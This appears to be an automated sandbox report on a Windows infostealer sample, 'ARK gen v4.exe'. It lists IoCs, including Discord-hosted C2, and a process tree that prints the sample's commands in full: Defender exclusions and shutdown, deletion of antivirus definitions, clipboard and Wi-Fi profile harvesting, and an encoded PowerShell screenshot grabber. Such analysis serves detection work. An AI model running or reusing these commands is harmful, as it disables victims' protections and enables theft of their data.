Analysis
-
max time kernel
64s -
max time network
70s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241211-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
21-12-2024 17:46
Behavioral task
behavioral1
Sample
ARK gen v4.exe
Resource
win10ltsc2021-20241211-en
General
-
Target
ARK gen v4.exe
-
Size
5.9MB
-
MD5
3ffe9096a09d9945254115d93d22fe69
-
SHA1
ca12c68e82bbd5a656c817eaf46bf17da0a0689a
-
SHA256
de83827afad4b125b56f60826cd83c4c0f699e6454d4869e74a7fba4874e04f8
-
SHA512
c54a576ce877215f14150bc0fe69913f99bb2e807d5c21bffddc5a91bfd7e2a76f32a39a07c7df5cbd03f13145b241a60f5b55bec1a1e3a2ea97a914cfc4f617
-
SSDEEP
98304:mkDe7pzfmt8MMhJMjarCtaCObO/OH9KkqQz4W1kgeDgFM713eMWOL:mhNzfB6yA+KO0WRti7/WOL
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid Process 4772 MpCmdRun.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3612 powershell.exe 1364 powershell.exe 3052 powershell.exe 3288 powershell.exe 3388 powershell.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts ARK gen v4.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 2056 cmd.exe 2008 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 4192 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 1896 ARK gen v4.exe 1896 ARK gen v4.exe 1896 ARK gen v4.exe 1896 ARK gen v4.exe 1896 ARK gen v4.exe 1896 ARK gen v4.exe 1896 ARK gen v4.exe 1896 ARK gen v4.exe 1896 ARK gen v4.exe 1896 ARK gen v4.exe 1896 ARK gen v4.exe 1896 ARK gen v4.exe 1896 ARK gen v4.exe 1896 ARK gen v4.exe 1896 ARK gen v4.exe 1896 ARK gen v4.exe 1896 ARK gen v4.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 22 discord.com 24 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 20 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
pid Process 4120 tasklist.exe 3212 tasklist.exe 756 tasklist.exe 4920 tasklist.exe -
resource yara_rule behavioral1/files/0x00280000000461de-21.dat upx behavioral1/memory/1896-25-0x00007FFDC6E20000-0x00007FFDC7286000-memory.dmp upx behavioral1/files/0x00280000000461b7-27.dat upx behavioral1/memory/1896-30-0x00007FFDD9E80000-0x00007FFDD9EA4000-memory.dmp upx behavioral1/files/0x00280000000461dc-31.dat upx behavioral1/memory/1896-48-0x00007FFDDF7D0000-0x00007FFDDF7DF000-memory.dmp upx behavioral1/files/0x00280000000461d3-47.dat upx behavioral1/files/0x00280000000461c1-46.dat upx behavioral1/files/0x00280000000461c0-45.dat upx behavioral1/files/0x00280000000461bf-44.dat upx behavioral1/files/0x00280000000461ba-43.dat upx behavioral1/files/0x00280000000461b9-42.dat upx behavioral1/files/0x00280000000461b8-41.dat upx behavioral1/files/0x00280000000461b6-40.dat upx behavioral1/files/0x00260000000461ff-39.dat upx behavioral1/files/0x00260000000461fb-38.dat upx behavioral1/files/0x00280000000461f5-37.dat upx behavioral1/files/0x00280000000461dd-34.dat upx behavioral1/files/0x00280000000461db-33.dat upx behavioral1/memory/1896-54-0x00007FFDD5EE0000-0x00007FFDD5F0C000-memory.dmp upx behavioral1/memory/1896-56-0x00007FFDD5F40000-0x00007FFDD5F58000-memory.dmp upx behavioral1/memory/1896-58-0x00007FFDD5EC0000-0x00007FFDD5EDF000-memory.dmp upx behavioral1/memory/1896-60-0x00007FFDC6CA0000-0x00007FFDC6E1D000-memory.dmp upx behavioral1/memory/1896-62-0x00007FFDD5EA0000-0x00007FFDD5EB9000-memory.dmp upx behavioral1/memory/1896-64-0x00007FFDDF540000-0x00007FFDDF54D000-memory.dmp upx behavioral1/memory/1896-66-0x00007FFDD5E70000-0x00007FFDD5E9E000-memory.dmp upx behavioral1/memory/1896-71-0x00007FFDD5A60000-0x00007FFDD5B18000-memory.dmp upx behavioral1/memory/1896-74-0x00007FFDD9E80000-0x00007FFDD9EA4000-memory.dmp upx behavioral1/memory/1896-73-0x00007FFDC6920000-0x00007FFDC6C95000-memory.dmp upx behavioral1/memory/1896-76-0x00007FFDD5E20000-0x00007FFDD5E35000-memory.dmp upx behavioral1/memory/1896-70-0x00007FFDC6E20000-0x00007FFDC7286000-memory.dmp upx behavioral1/memory/1896-79-0x00007FFDDABB0000-0x00007FFDDABBD000-memory.dmp upx behavioral1/memory/1896-78-0x00007FFDD5EE0000-0x00007FFDD5F0C000-memory.dmp upx behavioral1/memory/1896-84-0x00007FFDD56B0000-0x00007FFDD57C8000-memory.dmp upx behavioral1/memory/1896-83-0x00007FFDD5F40000-0x00007FFDD5F58000-memory.dmp upx behavioral1/memory/1896-113-0x00007FFDD5EC0000-0x00007FFDD5EDF000-memory.dmp upx behavioral1/memory/1896-187-0x00007FFDC6CA0000-0x00007FFDC6E1D000-memory.dmp upx behavioral1/memory/1896-251-0x00007FFDD5EA0000-0x00007FFDD5EB9000-memory.dmp upx behavioral1/memory/1896-275-0x00007FFDDF540000-0x00007FFDDF54D000-memory.dmp upx behavioral1/memory/1896-279-0x00007FFDD5E70000-0x00007FFDD5E9E000-memory.dmp upx behavioral1/memory/1896-292-0x00007FFDD5A60000-0x00007FFDD5B18000-memory.dmp upx behavioral1/memory/1896-295-0x00007FFDC6920000-0x00007FFDC6C95000-memory.dmp upx behavioral1/memory/1896-316-0x00007FFDC6E20000-0x00007FFDC7286000-memory.dmp upx behavioral1/memory/1896-322-0x00007FFDC6CA0000-0x00007FFDC6E1D000-memory.dmp upx behavioral1/memory/1896-321-0x00007FFDD5EC0000-0x00007FFDD5EDF000-memory.dmp upx behavioral1/memory/1896-317-0x00007FFDD9E80000-0x00007FFDD9EA4000-memory.dmp upx behavioral1/memory/1896-331-0x00007FFDC6E20000-0x00007FFDC7286000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 1088 cmd.exe 1152 netsh.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2836 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 2676 systeminfo.exe -
Suspicious behavior: EnumeratesProcesses 40 IoCs
pid Process 3052 powershell.exe 3612 powershell.exe 1364 powershell.exe 3052 powershell.exe 3612 powershell.exe 1364 powershell.exe 3244 WMIC.exe 3244 WMIC.exe 3244 WMIC.exe 3244 WMIC.exe 2008 powershell.exe 2008 powershell.exe 3064 powershell.exe 3064 powershell.exe 2008 powershell.exe 3064 powershell.exe 3288 powershell.exe 3288 powershell.exe 3940 powershell.exe 3940 powershell.exe 3728 WMIC.exe 3728 WMIC.exe 3728 WMIC.exe 3728 WMIC.exe 1508 WMIC.exe 1508 WMIC.exe 1508 WMIC.exe 1508 WMIC.exe 4408 WMIC.exe 4408 WMIC.exe 4408 WMIC.exe 4408 WMIC.exe 3388 powershell.exe 3388 powershell.exe 2836 WMIC.exe 2836 WMIC.exe 2836 WMIC.exe 2836 WMIC.exe 4176 powershell.exe 4176 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3052 powershell.exe Token: SeDebugPrivilege 3612 powershell.exe Token: SeDebugPrivilege 1364 powershell.exe Token: SeIncreaseQuotaPrivilege 3612 powershell.exe Token: SeSecurityPrivilege 3612 powershell.exe Token: SeTakeOwnershipPrivilege 3612 powershell.exe Token: SeLoadDriverPrivilege 3612 powershell.exe Token: SeSystemProfilePrivilege 3612 powershell.exe Token: SeSystemtimePrivilege 3612 powershell.exe Token: SeProfSingleProcessPrivilege 3612 powershell.exe Token: SeIncBasePriorityPrivilege 3612 powershell.exe Token: SeCreatePagefilePrivilege 3612 powershell.exe Token: SeBackupPrivilege 3612 powershell.exe Token: SeRestorePrivilege 3612 powershell.exe Token: SeShutdownPrivilege 3612 powershell.exe Token: SeDebugPrivilege 3612 powershell.exe Token: SeSystemEnvironmentPrivilege 3612 powershell.exe Token: SeRemoteShutdownPrivilege 3612 powershell.exe Token: SeUndockPrivilege 3612 powershell.exe Token: SeManageVolumePrivilege 3612 powershell.exe Token: 33 3612 powershell.exe Token: 34 3612 powershell.exe Token: 35 3612 powershell.exe Token: 36 3612 powershell.exe Token: SeIncreaseQuotaPrivilege 1364 powershell.exe Token: SeSecurityPrivilege 1364 powershell.exe Token: SeTakeOwnershipPrivilege 1364 powershell.exe Token: SeLoadDriverPrivilege 1364 powershell.exe Token: SeSystemProfilePrivilege 1364 powershell.exe Token: SeSystemtimePrivilege 1364 powershell.exe Token: SeProfSingleProcessPrivilege 1364 powershell.exe Token: SeIncBasePriorityPrivilege 1364 powershell.exe Token: SeCreatePagefilePrivilege 1364 powershell.exe Token: SeBackupPrivilege 1364 powershell.exe Token: SeRestorePrivilege 1364 powershell.exe Token: SeShutdownPrivilege 1364 powershell.exe Token: SeDebugPrivilege 1364 powershell.exe Token: SeSystemEnvironmentPrivilege 1364 powershell.exe Token: SeRemoteShutdownPrivilege 1364 powershell.exe Token: SeUndockPrivilege 1364 powershell.exe Token: SeManageVolumePrivilege 1364 powershell.exe Token: 33 1364 powershell.exe Token: 34 1364 powershell.exe Token: 35 1364 powershell.exe Token: 36 1364 powershell.exe Token: SeIncreaseQuotaPrivilege 3052 powershell.exe Token: SeSecurityPrivilege 3052 powershell.exe Token: SeTakeOwnershipPrivilege 3052 powershell.exe Token: SeLoadDriverPrivilege 3052 powershell.exe Token: SeSystemProfilePrivilege 3052 powershell.exe Token: SeSystemtimePrivilege 3052 powershell.exe Token: SeProfSingleProcessPrivilege 3052 powershell.exe Token: SeIncBasePriorityPrivilege 3052 powershell.exe Token: SeCreatePagefilePrivilege 3052 powershell.exe Token: SeBackupPrivilege 3052 powershell.exe Token: SeRestorePrivilege 3052 powershell.exe Token: SeShutdownPrivilege 3052 powershell.exe Token: SeDebugPrivilege 3052 powershell.exe Token: SeSystemEnvironmentPrivilege 3052 powershell.exe Token: SeRemoteShutdownPrivilege 3052 powershell.exe Token: SeUndockPrivilege 3052 powershell.exe Token: SeManageVolumePrivilege 3052 powershell.exe Token: 33 3052 powershell.exe Token: 34 3052 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1444 wrote to memory of 1896 1444 ARK gen v4.exe 83 PID 1444 wrote to memory of 1896 1444 ARK gen v4.exe 83 PID 1896 wrote to memory of 3372 1896 ARK gen v4.exe 85 PID 1896 wrote to memory of 3372 1896 ARK gen v4.exe 85 PID 1896 wrote to memory of 420 1896 ARK gen v4.exe 86 PID 1896 wrote to memory of 420 1896 ARK gen v4.exe 86 PID 1896 wrote to memory of 4056 1896 ARK gen v4.exe 89 PID 1896 wrote to memory of 4056 1896 ARK gen v4.exe 89 PID 3372 wrote to memory of 3612 3372 cmd.exe 91 PID 3372 wrote to memory of 3612 3372 cmd.exe 91 PID 420 wrote to memory of 3052 420 cmd.exe 92 PID 420 wrote to memory of 3052 420 cmd.exe 92 PID 4056 wrote to memory of 1364 4056 cmd.exe 93 PID 4056 wrote to memory of 1364 4056 cmd.exe 93 PID 1896 wrote to memory of 2324 1896 ARK gen v4.exe 95 PID 1896 wrote to memory of 2324 1896 ARK gen v4.exe 95 PID 1896 wrote to memory of 3112 1896 ARK gen v4.exe 97 PID 1896 wrote to memory of 3112 1896 ARK gen v4.exe 97 PID 2324 wrote to memory of 4120 2324 cmd.exe 99 PID 2324 wrote to memory of 4120 2324 cmd.exe 99 PID 3112 wrote to memory of 3212 3112 cmd.exe 100 PID 3112 wrote to memory of 3212 3112 cmd.exe 100 PID 1896 wrote to memory of 4512 1896 ARK gen v4.exe 101 PID 1896 wrote to memory of 4512 1896 ARK gen v4.exe 101 PID 1896 wrote to memory of 2056 1896 ARK gen v4.exe 103 PID 1896 wrote to memory of 2056 1896 ARK gen v4.exe 103 PID 4512 wrote to memory of 3244 4512 cmd.exe 106 PID 4512 wrote to memory of 3244 4512 cmd.exe 106 PID 1896 wrote to memory of 5096 1896 ARK gen v4.exe 107 PID 1896 wrote to memory of 5096 1896 ARK gen v4.exe 107 PID 1896 wrote to memory of 3988 1896 ARK gen v4.exe 108 PID 1896 wrote to memory of 3988 1896 ARK gen v4.exe 108 PID 1896 wrote to memory of 1088 1896 ARK gen v4.exe 110 PID 1896 wrote to memory of 1088 1896 ARK gen v4.exe 110 PID 1896 wrote to memory of 832 1896 ARK gen v4.exe 112 PID 1896 wrote to memory of 832 1896 ARK gen v4.exe 112 PID 1896 wrote to memory of 3616 1896 ARK gen v4.exe 148 PID 1896 wrote to memory of 3616 1896 ARK gen v4.exe 148 PID 2056 wrote to memory of 2008 2056 cmd.exe 115 PID 2056 wrote to memory of 2008 2056 cmd.exe 115 PID 1896 wrote to memory of 4328 1896 ARK gen v4.exe 117 PID 1896 wrote to memory of 4328 1896 ARK gen v4.exe 117 PID 832 wrote to memory of 2676 832 cmd.exe 120 PID 832 wrote to memory of 2676 832 cmd.exe 120 PID 3988 wrote to memory of 4988 3988 cmd.exe 121 PID 3988 wrote to memory of 4988 3988 cmd.exe 121 PID 4328 wrote to memory of 3064 4328 cmd.exe 122 PID 4328 wrote to memory of 3064 4328 cmd.exe 122 PID 5096 wrote to memory of 756 5096 cmd.exe 123 PID 5096 wrote to memory of 756 5096 cmd.exe 123 PID 1088 wrote to memory of 1152 1088 cmd.exe 124 PID 1088 wrote to memory of 1152 1088 cmd.exe 124 PID 3616 wrote to memory of 2292 3616 cmd.exe 125 PID 3616 wrote to memory of 2292 3616 cmd.exe 125 PID 1896 wrote to memory of 4364 1896 ARK gen v4.exe 126 PID 1896 wrote to memory of 4364 1896 ARK gen v4.exe 126 PID 1896 wrote to memory of 2172 1896 ARK gen v4.exe 128 PID 1896 wrote to memory of 2172 1896 ARK gen v4.exe 128 PID 4364 wrote to memory of 4524 4364 cmd.exe 130 PID 4364 wrote to memory of 4524 4364 cmd.exe 130 PID 2172 wrote to memory of 4184 2172 cmd.exe 131 PID 2172 wrote to memory of 4184 2172 cmd.exe 131 PID 1896 wrote to memory of 3352 1896 ARK gen v4.exe 132 PID 1896 wrote to memory of 3352 1896 ARK gen v4.exe 132 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 4184 attrib.exe 3376 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ARK gen v4.exe"C:\Users\Admin\AppData\Local\Temp\ARK gen v4.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Users\Admin\AppData\Local\Temp\ARK gen v4.exe"C:\Users\Admin\AppData\Local\Temp\ARK gen v4.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ARK gen v4.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:3372 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ARK gen v4.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3612
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:420 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3052
-
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All4⤵
- Deletes Windows Defender Definitions
PID:4772
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:4056 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1364
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2324 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:4120
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3112 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3212
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:4512 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3244
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:2056 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:2008
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:5096 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:756
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:3988 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:4988
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:1088 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:1152
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
- Suspicious use of WriteProcessMemory
PID:832 -
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:2676
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵
- Suspicious use of WriteProcessMemory
PID:3616 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:2292
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵
- Suspicious use of WriteProcessMemory
PID:4328 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 